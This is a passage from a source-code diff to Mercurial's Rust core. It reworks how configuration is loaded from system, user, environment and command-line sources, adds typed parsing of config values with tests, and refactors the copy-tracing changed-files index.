{}) ====\n{:?}", - index, layer.trusted, layer + write_bytes!( + out, + b"==== Layer {} (trusted: {}) ====\n{}", + index, + if layer.trusted { + &b"yes"[..] + } else { + &b"no"[..] + }, + layer )?; } Ok(()) @@ -40,15 +59,176 @@ Parsed(layer::ConfigLayer), } -pub fn parse_bool(v: &[u8]) -> Option<bool> { - match v.to_ascii_lowercase().as_slice() { - b"1" | b"yes" | b"true" | b"on" | b"always" => Some(true), - b"0" | b"no" | b"false" | b"off" | b"never" => Some(false), - _ => None, +#[derive(Debug)] +pub struct ConfigValueParseError { + pub origin: ConfigOrigin, + pub line: Option<usize>, + pub section: Vec<u8>, + pub item: Vec<u8>, + pub value: Vec<u8>, + pub expected_type: &'static str, +} + +impl fmt::Display for ConfigValueParseError { + fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { + // TODO: add origin and line number information, here and in + // corresponding python code + write!( + f, + "config error: {}.{} is not a {} ('{}')", + String::from_utf8_lossy(&self.section), + String::from_utf8_lossy(&self.item), + self.expected_type, + String::from_utf8_lossy(&self.value) + ) } } impl Config { + /// Load system and user configuration from various files. + /// + /// This is also affected by some environment variables. + pub fn load( + cli_config_args: impl IntoIterator<Item = impl AsRef<[u8]>>, + ) -> Result<Self, ConfigError> { + let mut config = Self { layers: Vec::new() }; + let opt_rc_path = env::var_os("HGRCPATH"); + // HGRCPATH replaces system config + if opt_rc_path.is_none() { + config.add_system_config()? + } + + config.add_for_environment_variable("EDITOR", b"ui", b"editor"); + config.add_for_environment_variable("VISUAL", b"ui", b"editor"); + config.add_for_environment_variable("PAGER", b"pager", b"pager"); + + // These are set by `run-tests.py --rhg` to enable fallback for the + // entire test suite. Alternatives would be setting configuration + // through `$HGRCPATH` but some tests override that, or changing the + // `hg` shell alias to include `--config` but that disrupts tests that + // print command lines and check expected output. + config.add_for_environment_variable( + "RHG_ON_UNSUPPORTED", + b"rhg", + b"on-unsupported", + ); + config.add_for_environment_variable( + "RHG_FALLBACK_EXECUTABLE", + b"rhg", + b"fallback-executable", + ); + + // HGRCPATH replaces user config + if opt_rc_path.is_none() { + config.add_user_config()? + } + if let Some(rc_path) = &opt_rc_path { + for path in env::split_paths(rc_path) { + if !path.as_os_str().is_empty() { + if path.is_dir() { + config.add_trusted_dir(&path)? + } else { + config.add_trusted_file(&path)? + } + } + } + } + if let Some(layer) = ConfigLayer::parse_cli_args(cli_config_args)? { + config.layers.push(layer) + } + Ok(config) + } + + fn add_trusted_dir(&mut self, path: &Path) -> Result<(), ConfigError> { + if let Some(entries) = std::fs::read_dir(path) + .when_reading_file(path) + .io_not_found_as_none()? + { + let mut file_paths = entries + .map(|result| { + result.when_reading_file(path).map(|entry| entry.path()) + }) + .collect::<Result<Vec<_>, _>>()?; + file_paths.sort(); + for file_path in &file_paths { + if file_path.extension() == Some(std::ffi::OsStr::new("rc")) { + self.add_trusted_file(&file_path)? + } + } + } + Ok(()) + } + + fn add_trusted_file(&mut self, path: &Path) -> Result<(), ConfigError> { + if let Some(data) = std::fs::read(path) + .when_reading_file(path) + .io_not_found_as_none()? + { + self.layers.extend(ConfigLayer::parse(path, &data)?) + } + Ok(()) + } + + fn add_for_environment_variable( + &mut self, + var: &str, + section: &[u8], + key: &[u8], + ) { + if let Some(value) = env::var_os(var) { + let origin = layer::ConfigOrigin::Environment(var.into()); + let mut layer = ConfigLayer::new(origin); + layer.add( + section.to_owned(), + key.to_owned(), + get_bytes_from_os_str(value), + None, + ); + self.layers.push(layer) + } + } + + #[cfg(unix)] // TODO: other platforms + fn add_system_config(&mut self) -> Result<(), ConfigError> { + let mut add_for_prefix = |prefix: &Path| -> Result<(), ConfigError> { + let etc = prefix.join("etc").join("mercurial"); + self.add_trusted_file(&etc.join("hgrc"))?; + self.add_trusted_dir(&etc.join("hgrc.d")) + }; + let root = Path::new("/"); + // TODO: use `std::env::args_os().next().unwrap()` a.k.a. argv[0] + // instead? TODO: can this be a relative path? + let hg = crate::utils::current_exe()?; + // TODO: this order (per-installation then per-system) matches + // `systemrcpath()` in `mercurial/scmposix.py`, but + // `mercurial/helptext/config.txt` suggests it should be reversed + if let Some(installation_prefix) = hg.parent().and_then(Path::parent) { + if installation_prefix != root { + add_for_prefix(&installation_prefix)? + } + } + add_for_prefix(root)?; + Ok(()) + } + + #[cfg(unix)] // TODO: other plateforms + fn add_user_config(&mut self) -> Result<(), ConfigError> { + let opt_home = home::home_dir(); + if let Some(home) = &opt_home { + self.add_trusted_file(&home.join(".hgrc"))? + } + let darwin = cfg!(any(target_os = "macos", target_os = "ios")); + if !darwin { + if let Some(config_home) = env::var_os("XDG_CONFIG_HOME") + .map(PathBuf::from) + .or_else(|| opt_home.map(|home| home.join(".config"))) + { + self.add_trusted_file(&config_home.join("hg").join("hgrc"))? + } + } + Ok(()) + } + /// Loads in order, which means that the precedence is the same /// as the order of `sources`. pub fn load_from_explicit_sources( @@ -62,7 +242,7 @@ ConfigSource::AbsPath(c) => { // TODO check if it should be trusted // mercurial/ui.py:427 - let data = match read_whole_file(&c) { + let data = match std::fs::read(&c) { Err(_) => continue, // same as the python code Ok(data) => data, }; @@ -74,13 +254,86 @@ Ok(Config { layers }) } - /// Loads the local config. In a future version, this will also load the - /// `$HOME/.hgrc` and more to mirror the Python implementation. - pub fn load() -> Result<Self, ConfigError> { - let root = find_root().unwrap(); - Ok(Self::load_from_explicit_sources(vec![ - ConfigSource::AbsPath(root.join(".hg/hgrc")), - ])?) + /// Loads the per-repository config into a new `Config` which is combined + /// with `self`. + pub(crate) fn combine_with_repo( + &self, + repo_config_files: &[PathBuf], + ) -> Result<Self, ConfigError> { + let (cli_layers, other_layers) = self + .layers + .iter() + .cloned() + .partition(ConfigLayer::is_from_command_line); + + let mut repo_config = Self { + layers: other_layers, + }; + for path in repo_config_files { + // TODO: check if this file should be trusted: + // `mercurial/ui.py:427` + repo_config.add_trusted_file(path)?; + } + repo_config.layers.extend(cli_layers); + Ok(repo_config) + } + + fn get_parse<'config, T: 'config>( + &'config self, + section: &[u8], + item: &[u8], + expected_type: &'static str, + parse: impl Fn(&'config [u8]) -> Option<T>, + ) -> Result<Option<T>, ConfigValueParseError> { + match self.get_inner(§ion, &item) { + Some((layer, v)) => match parse(&v.bytes) { + Some(b) => Ok(Some(b)), + None => Err(ConfigValueParseError { + origin: layer.origin.to_owned(), + line: v.line, + value: v.bytes.to_owned(), + section: section.to_owned(), + item: item.to_owned(), + expected_type, + }), + }, + None => Ok(None), + } + } + + /// Returns an `Err` if the first value found is not a valid UTF-8 string. + /// Otherwise, returns an `Ok(value)` if found, or `None`. + pub fn get_str( + &self, + section: &[u8], + item: &[u8], + ) -> Result<Option<&str>, ConfigValueParseError> { + self.get_parse(section, item, "ASCII or UTF-8 string", |value| { + str::from_utf8(value).ok() + }) + } + + /// Returns an `Err` if the first value found is not a valid unsigned + /// integer. Otherwise, returns an `Ok(value)` if found, or `None`. + pub fn get_u32( + &self, + section: &[u8], + item: &[u8], + ) -> Result<Option<u32>, ConfigValueParseError> { + self.get_parse(section, item, "valid integer", |value| { + str::from_utf8(value).ok()?.parse().ok() + }) + } + + /// Returns an `Err` if the first value found is not a valid file size + /// value such as `30` (default unit is bytes), `7 MB`, or `42.5 kb`. + /// Otherwise, returns an `Ok(value_in_bytes)` if found, or `None`. + pub fn get_byte_size( + &self, + section: &[u8], + item: &[u8], + ) -> Result<Option<u64>, ConfigValueParseError> { + self.get_parse(section, item, "byte quantity", values::parse_byte_size) } /// Returns an `Err` if the first value found is not a valid boolean. @@ -90,18 +343,8 @@ &self, section: &[u8], item: &[u8], - ) -> Result<Option<bool>, ConfigError> { - match self.get_inner(§ion, &item) { - Some((layer, v)) => match parse_bool(&v.bytes) { - Some(b) => Ok(Some(b)), - None => Err(ConfigError::Parse { - origin: layer.origin.to_owned(), - line: v.line, - bytes: v.bytes.to_owned(), - }), - }, - None => Ok(None), - } + ) -> Result<Option<bool>, ConfigValueParseError> { + self.get_parse(section, item, "boolean", values::parse_bool) } /// Returns the corresponding boolean in the config. Returns `Ok(false)` @@ -110,10 +353,35 @@ &self, section: &[u8], item: &[u8], - ) -> Result<bool, ConfigError> { + ) -> Result<bool, ConfigValueParseError> { Ok(self.get_option(section, item)?.unwrap_or(false)) } + /// Returns the corresponding list-value in the config if found, or `None`. + /// + /// This is appropriate for new configuration keys. The value syntax is + /// **not** the same as most existing list-valued config, which has Python + /// parsing implemented in `parselist()` in `mercurial/config.py`. + /// Faithfully porting that parsing algorithm to Rust (including behavior + /// that are arguably bugs) turned out to be non-trivial and hasn’t been + /// completed as of this writing. + /// + /// Instead, the "simple" syntax is: split on comma, then trim leading and + /// trailing whitespace of each component. Quotes or backslashes are not + /// interpreted in any way. Commas are mandatory between values. Values + /// that contain a comma are not supported. + pub fn get_simple_list( + &self, + section: &[u8], + item: &[u8], + ) -> Option<impl Iterator<Item = &[u8]>> { + self.get(section, item).map(|value| { + value + .split(|&byte| byte == b',') + .map(|component| component.trim()) + }) + } + /// Returns the raw value bytes of the first one found, or `None`. pub fn get(&self, section: &[u8], item: &[u8]) -> Option<&[u8]> { self.get_inner(section, item) @@ -137,6 +405,14 @@ None } + /// Return all keys defined for the given section + pub fn get_section_keys(&self, section: &[u8]) -> HashSet<&[u8]> { + self.layers + .iter() + .flat_map(|layer| layer.iter_keys(section)) + .collect() + } + /// Get raw values bytes from all layers (even untrusted ones) in order /// of precedence. #[cfg(test)] @@ -169,15 +445,14 @@ let base_config_path = tmpdir_path.join("base.rc"); let mut config_file = File::create(&base_config_path).unwrap(); let data = - b"[section]\nitem=value0\n%include included.rc\nitem=value2"; + b"[section]\nitem=value0\n%include included.rc\nitem=value2\n\ + [section2]\ncount = 4\nsize = 1.5 KB\nnot-count = 1.5\nnot-size = 1 ub"; config_file.write_all(data).unwrap(); let sources = vec![ConfigSource::AbsPath(base_config_path)]; let config = Config::load_from_explicit_sources(sources) .expect("expected valid config"); - dbg!(&config); - let (_, value) = config.get_inner(b"section", b"item").unwrap(); assert_eq!( value, @@ -193,5 +468,13 @@ config.get_all(b"section", b"item"), [b"value2", b"value1", b"value0"] ); + + assert_eq!(config.get_u32(b"section2", b"count").unwrap(), Some(4)); + assert_eq!( + config.get_byte_size(b"section2", b"size").unwrap(), + Some(1024 + 512) + ); + assert!(config.get_u32(b"section2", b"not-count").is_err()); + assert!(config.get_byte_size(b"section2", b"not-size").is_err()); } } diff --git a/rust/hg-core/src/config/layer.rs b/rust/hg-core/src/config/layer.rs --- a/rust/hg-core/src/config/layer.rs +++ b/rust/hg-core/src/config/layer.rs @@ -7,14 +7,12 @@ // This software may be used and distributed according to the terms of the // GNU General Public License version 2 or any later version. -use crate::utils::files::{ - get_bytes_from_path, get_path_from_bytes, read_whole_file, -}; -use format_bytes::format_bytes; +use crate::errors::HgError; +use crate::utils::files::{get_bytes_from_path, get_path_from_bytes}; +use format_bytes::{format_bytes, write_bytes, DisplayBytes}; use lazy_static::lazy_static; use regex::bytes::Regex; use std::collections::HashMap; -use std::io; use std::path::{Path, PathBuf}; lazy_static! { @@ -53,6 +51,51 @@ } } + /// Parse `--config` CLI arguments and return a layer if there’s any + pub(crate) fn parse_cli_args( + cli_config_args: impl IntoIterator<Item = impl AsRef<[u8]>>, + ) -> Result<Option<Self>, ConfigError> { + fn parse_one(arg: &[u8]) -> Option<(Vec<u8>, Vec<u8>, Vec<u8>)> { + use crate::utils::SliceExt; + + let (section_and_item, value) = arg.split_2(b'=')?; + let (section, item) = section_and_item.trim().split_2(b'.')?; + Some(( + section.to_owned(), + item.to_owned(), + value.trim().to_owned(), + )) + } + + let mut layer = Self::new(ConfigOrigin::CommandLine); + for arg in cli_config_args { + let arg = arg.as_ref(); + if let Some((section, item, value)) = parse_one(arg) { + layer.add(section, item, value, None); + } else { + Err(HgError::abort(format!( + "abort: malformed --config option: '{}' \ + (use --config section.name=value)", + String::from_utf8_lossy(arg), + )))? + } + } + if layer.sections.is_empty() { + Ok(None) + } else { + Ok(Some(layer)) + } + } + + /// Returns whether this layer comes from `--config` CLI arguments + pub(crate) fn is_from_command_line(&self) -> bool { + if let ConfigOrigin::CommandLine = self.origin { + true + } else { + false + } + } + /// Add an entry to the config, overwriting the old one if already present. pub fn add( &mut self, @@ -72,6 +115,14 @@ Some(self.sections.get(section)?.get(item)?) } + /// Returns the keys defined in the given section + pub fn iter_keys(&self, section: &[u8]) -> impl Iterator<Item = &[u8]> { + self.sections + .get(section) + .into_iter() + .flat_map(|section| section.keys().map(|vec| &**vec)) + } + pub fn is_empty(&self) -> bool { self.sections.is_empty() } @@ -96,21 +147,39 @@ let mut section = b"".to_vec(); while let Some((index, bytes)) = lines_iter.next() { + let line = Some(index + 1); if let Some(m) = INCLUDE_RE.captures(&bytes) { let filename_bytes = &m[1]; - let filename_to_include = get_path_from_bytes(&filename_bytes); - match read_include(&src, &filename_to_include) { - (include_src, Ok(data)) => { + let filename_bytes = crate::utils::expand_vars(filename_bytes); + // `Path::parent` only fails for the root directory, + // which `src` can’t be since we’ve managed to open it as a + // file. + let dir = src + .parent() + .expect("Path::parent fail on a file we’ve read"); + // `Path::join` with an absolute argument correctly ignores the + // base path + let filename = dir.join(&get_path_from_bytes(&filename_bytes)); + match std::fs::read(&filename) { + Ok(data) => { layers.push(current_layer); - layers.extend(Self::parse(&include_src, &data)?); + layers.extend(Self::parse(&filename, &data)?); current_layer = Self::new(ConfigOrigin::File(src.to_owned())); } - (_, Err(e)) => { - return Err(ConfigError::IncludeError { - path: filename_to_include.to_owned(), - io_error: e, - }) + Err(error) => { + if error.kind() != std::io::ErrorKind::NotFound { + return Err(ConfigParseError { + origin: ConfigOrigin::File(src.to_owned()), + line, + message: format_bytes!( + b"cannot include {} ({})", + filename_bytes, + format_bytes::Utf8(error) + ), + } + .into()); + } } } } else if let Some(_) = EMPTY_RE.captures(&bytes) { @@ -134,22 +203,23 @@ }; lines_iter.next(); } - current_layer.add( - section.clone(), - item, - value, - Some(index + 1), - ); + current_layer.add(section.clone(), item, value, line); } else if let Some(m) = UNSET_RE.captures(&bytes) { if let Some(map) = current_layer.sections.get_mut(§ion) { map.remove(&m[1]); } } else { - return Err(ConfigError::Parse { + let message = if bytes.starts_with(b" ") { + format_bytes!(b"unexpected leading whitespace: {}", bytes) + } else { + bytes.to_owned() + }; + return Err(ConfigParseError { origin: ConfigOrigin::File(src.to_owned()), - line: Some(index + 1), - bytes: bytes.to_owned(), - }); + line, + message, + } + .into()); } } if !current_layer.is_empty() { @@ -159,8 +229,11 @@ } } -impl std::fmt::Debug for ConfigLayer { - fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result { +impl DisplayBytes for ConfigLayer { + fn display_bytes( + &self, + out: &mut dyn std::io::Write, + ) -> std::io::Result<()> { let mut sections: Vec<_> = self.sections.iter().collect(); sections.sort_by(|e0, e1| e0.0.cmp(e1.0)); @@ -169,16 +242,13 @@ items.sort_by(|e0, e1| e0.0.cmp(e1.0)); for (item, config_entry) in items { - writeln!( - f, - "{}", - String::from_utf8_lossy(&format_bytes!( - b"{}.{}={} # {}", - section, - item, - &config_entry.bytes, - &self.origin.to_bytes(), - )) + write_bytes!( + out, + b"{}.{}={} # {}\n", + section, + item, + &config_entry.bytes, + &self.origin, )? } } @@ -205,9 +275,11 @@ #[derive(Clone, Debug)] pub enum ConfigOrigin { - /// The value comes from a configuration file + /// From a configuration file File(PathBuf), - /// The value comes from the environment like `$PAGER` or `$EDITOR` + /// From a `--config` CLI argument + CommandLine, + /// From environment variables like `$PAGER` or `$EDITOR` Environment(Vec<u8>), /* TODO cli * TODO defaults (configitems.py) @@ -216,53 +288,32 @@ * Others? */ } -impl ConfigOrigin { - /// TODO use some kind of dedicated trait? - pub fn to_bytes(&self) -> Vec<u8> { +impl DisplayBytes for ConfigOrigin { + fn display_bytes( + &self, + out: &mut dyn std::io::Write, + ) -> std::io::Result<()> { match self { - ConfigOrigin::File(p) => get_bytes_from_path(p), - ConfigOrigin::Environment(e) => e.to_owned(), + ConfigOrigin::File(p) => out.write_all(&get_bytes_from_path(p)), + ConfigOrigin::CommandLine => out.write_all(b"--config"), + ConfigOrigin::Environment(e) => write_bytes!(out, b"${}", e), } } } #[derive(Debug)] -pub enum ConfigError { - Parse { - origin: ConfigOrigin, - line: Option<usize>, - bytes: Vec<u8>, - }, - /// Failed to include a sub config file - IncludeError { - path: PathBuf, - io_error: std::io::Error, - }, - /// Any IO error that isn't expected - IO(std::io::Error), +pub struct ConfigParseError { + pub origin: ConfigOrigin, + pub line: Option<usize>, + pub message: Vec<u8>, } -impl From<std::io::Error> for ConfigError { - fn from(e: std::io::Error) -> Self { - Self::IO(e) - } +#[derive(Debug, derive_more::From)] +pub enum ConfigError { + Parse(ConfigParseError), + Other(HgError), } fn make_regex(pattern: &'static str) -> Regex { Regex::new(pattern).expect("expected a valid regex") } - -/// Includes are relative to the file they're defined in, unless they're -/// absolute. -fn read_include( - old_src: &Path, - new_src: &Path, -) -> (PathBuf, io::Result<Vec<u8>>) { - if new_src.is_absolute() { - (new_src.to_path_buf(), read_whole_file(&new_src)) - } else { - let dir = old_src.parent().unwrap(); - let new_src = dir.join(&new_src); - (new_src.to_owned(), read_whole_file(&new_src)) - } -} diff --git a/rust/hg-core/src/config/values.rs b/rust/hg-core/src/config/values.rs new file mode 100644 --- /dev/null +++ b/rust/hg-core/src/config/values.rs @@ -0,0 +1,61 @@ +//! Parsing functions for various type of configuration values. +//! +//! Returning `None` indicates a syntax error. Using a `Result` would be more +//! correct but would take more boilerplate for converting between error types, +//! compared to using `.ok()` on inner results of various error types to +//! convert them all to options. The `Config::get_parse` method later converts +//! those options to results with `ConfigValueParseError`, which contains +//! details about where the value came from (but omits details of what’s +//! invalid inside the value). + +pub(super) fn parse_bool(v: &[u8]) -> Option<bool> { + match v.to_ascii_lowercase().as_slice() { + b"1" | b"yes" | b"true" | b"on" | b"always" => Some(true), + b"0" | b"no" | b"false" | b"off" | b"never" => Some(false), + _ => None, + } +} + +pub(super) fn parse_byte_size(value: &[u8]) -> Option<u64> { + let value = std::str::from_utf8(value).ok()?.to_ascii_lowercase(); + const UNITS: &[(&str, u64)] = &[ + ("g", 1 << 30), + ("gb", 1 << 30), + ("m", 1 << 20), + ("mb", 1 << 20), + ("k", 1 << 10), + ("kb", 1 << 10), + ("b", 1 << 0), // Needs to be last + ]; + for &(unit, multiplier) in UNITS { + // TODO: use `value.strip_suffix(unit)` when we require Rust 1.45+ + if value.ends_with(unit) { + let value_before_unit = &value[..value.len() - unit.len()]; + let float: f64 = value_before_unit.trim().parse().ok()?; + if float >= 0.0 { + return Some((float * multiplier as f64).round() as u64); + } else { + return None; + } + } + } + value.parse().ok() +} + +#[test] +fn test_parse_byte_size() { + assert_eq!(parse_byte_size(b""), None); + assert_eq!(parse_byte_size(b"b"), None); + + assert_eq!(parse_byte_size(b"12"), Some(12)); + assert_eq!(parse_byte_size(b"12b"), Some(12)); + assert_eq!(parse_byte_size(b"12 b"), Some(12)); + assert_eq!(parse_byte_size(b"12.1 b"), Some(12)); + assert_eq!(parse_byte_size(b"1.1 K"), Some(1126)); + assert_eq!(parse_byte_size(b"1.1 kB"), Some(1126)); + + assert_eq!(parse_byte_size(b"-12 b"), None); + assert_eq!(parse_byte_size(b"-0.1 b"), None); + assert_eq!(parse_byte_size(b"0.1 b"), Some(0)); + assert_eq!(parse_byte_size(b"12.1 b"), Some(12)); +} diff --git a/rust/hg-core/src/copy_tracing.rs b/rust/hg-core/src/copy_tracing.rs --- a/rust/hg-core/src/copy_tracing.rs +++ b/rust/hg-core/src/copy_tracing.rs @@ -1,46 +1,121 @@ +#[cfg(test)] +#[macro_use] +mod tests_support; + +#[cfg(test)] +mod tests; + use crate::utils::hg_path::HgPath; use crate::utils::hg_path::HgPathBuf; use crate::Revision; use crate::NULL_REVISION; -use im_rc::ordmap::DiffItem; +use bytes_cast::{unaligned, BytesCast}; use im_rc::ordmap::Entry; use im_rc::ordmap::OrdMap; +use im_rc::OrdSet; use std::cmp::Ordering; use std::collections::HashMap; -use std::convert::TryInto; pub type PathCopies = HashMap<HgPathBuf, HgPathBuf>; type PathToken = usize; -#[derive(Clone, Debug, PartialEq, Copy)] -struct TimeStampedPathCopy { +#[derive(Clone, Debug)] +struct CopySource { /// revision at which the copy information was added rev: Revision, /// the copy source, (Set to None in case of deletion of the associated /// key) path: Option<PathToken>, + /// a set of previous `CopySource.rev` value directly or indirectly + /// overwritten by this one. + overwritten: OrdSet<Revision>, +} + +impl CopySource { + /// create a new CopySource + /// + /// Use this when no previous copy source existed. + fn new(rev: Revision, path: Option<PathToken>) -> Self { + Self { + rev, + path, + overwritten: OrdSet::new(), + } + } + + /// create a new CopySource from merging two others + /// + /// Use this when merging two InternalPathCopies requires active merging of + /// some entries. + fn new_from_merge(rev: Revision, winner: &Self, loser: &Self) -> Self { + let mut overwritten = OrdSet::new(); + overwritten.extend(winner.overwritten.iter().copied()); + overwritten.extend(loser.overwritten.iter().copied()); + overwritten.insert(winner.rev); + overwritten.insert(loser.rev); + Self { + rev, + path: winner.path, + overwritten: overwritten, + } + } + + /// Update the value of a pre-existing CopySource + /// + /// Use this when recording copy information from parent → child edges + fn overwrite(&mut self, rev: Revision, path: Option<PathToken>) { + self.overwritten.insert(self.rev); + self.rev = rev; + self.path = path; + } + + /// Mark pre-existing copy information as "dropped" by a file deletion + /// + /// Use this when recording copy information from parent → child edges + fn mark_delete(&mut self, rev: Revision) { + self.overwritten.insert(self.rev); + self.rev = rev; + self.path = None; + } + + /// Mark pre-existing copy information as "dropped" by a file deletion + /// + /// Use this when recording copy information from parent → child edges + fn mark_delete_with_pair(&mut self, rev: Revision, other: &Self) { + self.overwritten.insert(self.rev); + if other.rev != rev { + self.overwritten.insert(other.rev); + } + self.overwritten.extend(other.overwritten.iter().copied()); + self.rev = rev; + self.path = None; + } + + fn is_overwritten_by(&self, other: &Self) -> bool { + other.overwritten.contains(&self.rev) + } +} + +// For the same "dest", content generated for a given revision will always be +// the same. +impl PartialEq for CopySource { + fn eq(&self, other: &Self) -> bool { + #[cfg(debug_assertions)] + { + if self.rev == other.rev { + debug_assert!(self.path == other.path); + debug_assert!(self.overwritten == other.overwritten); + } + } + self.rev == other.rev + } } /// maps CopyDestination to Copy Source (+ a "timestamp" for the operation) -type TimeStampedPathCopies = OrdMap<PathToken, TimeStampedPathCopy>; - -/// hold parent 1, parent 2 and relevant files actions. -pub type RevInfo<'a> = (Revision, Revision, ChangedFiles<'a>); - -/// represent the files affected by a changesets -/// -/// This hold a subset of mercurial.metadata.ChangingFiles as we do not need -/// all the data categories tracked by it. -/// This hold a subset of mercurial.metadata.ChangingFiles as we do not need -/// all the data categories tracked by it. -pub struct ChangedFiles<'a> { - nb_items: u32, - index: &'a [u8], - data: &'a [u8], -} +type InternalPathCopies = OrdMap<PathToken, CopySource>; /// Represent active changes that affect the copy tracing. enum Action<'a> { @@ -51,7 +126,8 @@ Removed(&'a HgPath), /// The parent ? children edge introduce copy information between (dest, /// source) - Copied(&'a HgPath, &'a HgPath), + CopiedFromP1(&'a HgPath, &'a HgPath), + CopiedFromP2(&'a HgPath, &'a HgPath), } /// This express the possible "special" case we can get in a merge @@ -67,9 +143,6 @@ Normal, } -type FileChange<'a> = (u8, &'a HgPath, &'a HgPath); - -const EMPTY: &[u8] = b""; const COPY_MASK: u8 = 3; const P1_COPY: u8 = 2; const P2_COPY: u8 = 3; @@ -78,142 +151,94 @@ const MERGED: u8 = 8; const SALVAGED: u8 = 16; -impl<'a> ChangedFiles<'a> { - const INDEX_START: usize = 4; - const ENTRY_SIZE: u32 = 9; - const FILENAME_START: u32 = 1; - const COPY_SOURCE_START: u32 = 5; +#[derive(BytesCast)] +#[repr(C)] +struct ChangedFilesIndexEntry { + flags: u8, - pub fn new(data: &'a [u8]) -> Self { - assert!( - data.len() >= 4, - "data size ({}) is too small to contain the header (4)", - data.len() - ); - let nb_items_raw: [u8; 4] = (&data[0..=3]) - .try_into() - .expect("failed to turn 4 bytes into 4 bytes"); - let nb_items = u32::from_be_bytes(nb_items_raw); + /// Only the end position is stored. The start is at the end of the + /// previous entry. + destination_path_end_position: unaligned::U32Be, - let index_size = (nb_items * Self::ENTRY_SIZE) as usize; - let index_end = Self::INDEX_START + index_size; + source_index_entry_position: unaligned::U32Be, +} + +fn _static_assert_size_of() { + let _ = std::mem::transmute::<ChangedFilesIndexEntry, [u8; 9]>; +} - assert!( - data.len() >= index_end, - "data size ({}) is too small to fit the index_data ({})", - data.len(), - index_end - ); +/// Represents the files affected by a changeset. +/// +/// This holds a subset of `mercurial.metadata.ChangingFiles` as we do not need +/// all the data categories tracked by it. +pub struct ChangedFiles<'a> { + index: &'a [ChangedFilesIndexEntry], + paths: &'a [u8], +} - let ret = ChangedFiles { - nb_items, - index: &data[Self::INDEX_START..index_end], - data: &data[index_end..], - }; - let max_data = ret.filename_end(nb_items - 1) as usize; - assert!( - ret.data.len() >= max_data, - "data size ({}) is too small to fit all data ({})", - data.len(), - index_end + max_data - ); - ret +impl<'a> ChangedFiles<'a> { + pub fn new(data: &'a [u8]) -> Self { + let (header, rest) = unaligned::U32Be::from_bytes(data).unwrap(); + let nb_index_entries = header.get() as usize; + let (index, paths) = + ChangedFilesIndexEntry::slice_from_bytes(rest, nb_index_entries) + .unwrap(); + Self { index, paths } } pub fn new_empty() -> Self { ChangedFiles { - nb_items: 0, - index: EMPTY, - data: EMPTY, + index: &[], + paths: &[], } } - /// internal function to return an individual entry at a given index - fn entry(&'a self, idx: u32) -> FileChange<'a> { - if idx >= self.nb_items { - panic!( - "index for entry is higher that the number of file {} >= {}", - idx, self.nb_items - ) - } - let flags = self.flags(idx); - let filename = self.filename(idx); - let copy_idx = self.copy_idx(idx); - let copy_source = self.filename(copy_idx); - (flags, filename, copy_source) - } - - /// internal function to return the filename of the entry at a given index - fn filename(&self, idx: u32) -> &HgPath { - let filename_start; - if idx == 0 { - filename_start = 0; + /// Internal function to return the filename of the entry at a given index + fn path(&self, idx: usize) -> &HgPath { + let start = if idx == 0 { + 0 } else { - filename_start = self.filename_end(idx - 1) - } - let filename_end = self.filename_end(idx); - let filename_start = filename_start as usize; - let filename_end = filename_end as usize; - HgPath::new(&self.data[filename_start..filename_end]) - } - - /// internal function to return the flag field of the entry at a given - /// index - fn flags(&self, idx: u32) -> u8 { - let idx = idx as usize; - self.index[idx * (Self::ENTRY_SIZE as usize)] - } - - /// internal function to return the end of a filename part at a given index - fn filename_end(&self, idx: u32) -> u32 { - let start = (idx * Self::ENTRY_SIZE) + Self::FILENAME_START; - let end = (idx * Self::ENTRY_SIZE) + Self::COPY_SOURCE_START; - let start = start as usize; - let end = end as usize; - let raw = (&self.index[start..end]) - .try_into() - .expect("failed to turn 4 bytes into 4 bytes"); - u32::from_be_bytes(raw) - } - - /// internal function to return index of the copy source of the entry at a - /// given index - fn copy_idx(&self, idx: u32) -> u32 { - let start = (idx * Self::ENTRY_SIZE) + Self::COPY_SOURCE_START; - let end = (idx + 1) * Self::ENTRY_SIZE; - let start = start as usize; - let end = end as usize; - let raw = (&self.index[start..end]) - .try_into() - .expect("failed to turn 4 bytes into 4 bytes"); - u32::from_be_bytes(raw) + self.index[idx - 1].destination_path_end_position.get() as usize + }; + let end = self.index[idx].destination_path_end_position.get() as usize; + HgPath::new(&self.paths[start..end]) } /// Return an iterator over all the `Action` in this instance. - fn iter_actions(&self, parent: Parent) -> ActionsIterator { - ActionsIterator { - changes: &self, - parent: parent, - current: 0, - } + fn iter_actions(&self) -> impl Iterator<Item = Action> { + self.index.iter().enumerate().flat_map(move |(idx, entry)| { + let path = self.path(idx); + if (entry.flags & ACTION_MASK) == REMOVED { + Some(Action::Removed(path)) + } else if (entry.flags & COPY_MASK) == P1_COPY { + let source_idx = + entry.source_index_entry_position.get() as usize; + Some(Action::CopiedFromP1(path, self.path(source_idx))) + } else if (entry.flags & COPY_MASK) == P2_COPY { + let source_idx = + entry.source_index_entry_position.get() as usize; + Some(Action::CopiedFromP2(path, self.path(source_idx))) + } else { + None + } + }) } /// return the MergeCase value associated with a filename fn get_merge_case(&self, path: &HgPath) -> MergeCase { - if self.nb_items == 0 { + if self.index.is_empty() { return MergeCase::Normal; } let mut low_part = 0; - let mut high_part = self.nb_items; + let mut high_part = self.index.len(); while low_part < high_part { let cursor = (low_part + high_part - 1) / 2; - let (flags, filename, _source) = self.entry(cursor); - match path.cmp(filename) { + match path.cmp(self.path(cursor)) { Ordering::Less => low_part = cursor + 1, Ordering::Greater => high_part = cursor, Ordering::Equal => { - return match flags & ACTION_MASK { + return match self.index[cursor].flags & ACTION_MASK { MERGED => MergeCase::Merged, SALVAGED => MergeCase::Salvaged, _ => MergeCase::Normal, @@ -225,100 +250,6 @@ } } -/// A struct responsible for answering "is X ancestors of Y" quickly -/// -/// The structure will delegate ancestors call to a callback, and cache the -/// result. -#[derive(Debug)] -struct AncestorOracle<'a, A: Fn(Revision, Revision) -> bool> { - inner: &'a A, - pairs: HashMap<(Revision, Revision), bool>, -} - -impl<'a, A: Fn(Revision, Revision) -> bool> AncestorOracle<'a, A> { - fn new(func: &'a A) -> Self { - Self { - inner: func, - pairs: HashMap::default(), - } - } - - fn record_overwrite(&mut self, anc: Revision, desc: Revision) { - self.pairs.insert((anc, desc), true); - } - - /// returns `true` if `anc` is an ancestors of `desc`, `false` otherwise - fn is_overwrite(&mut self, anc: Revision, desc: Revision) -> bool { - if anc > desc { - false - } else if anc == desc { - true - } else { - if let Some(b) = self.pairs.get(&(anc, desc)) { - *b - } else { - let b = (self.inner)(anc, desc); - self.pairs.insert((anc, desc), b); - b - } - } - } -} - -struct ActionsIterator<'a> { - changes: 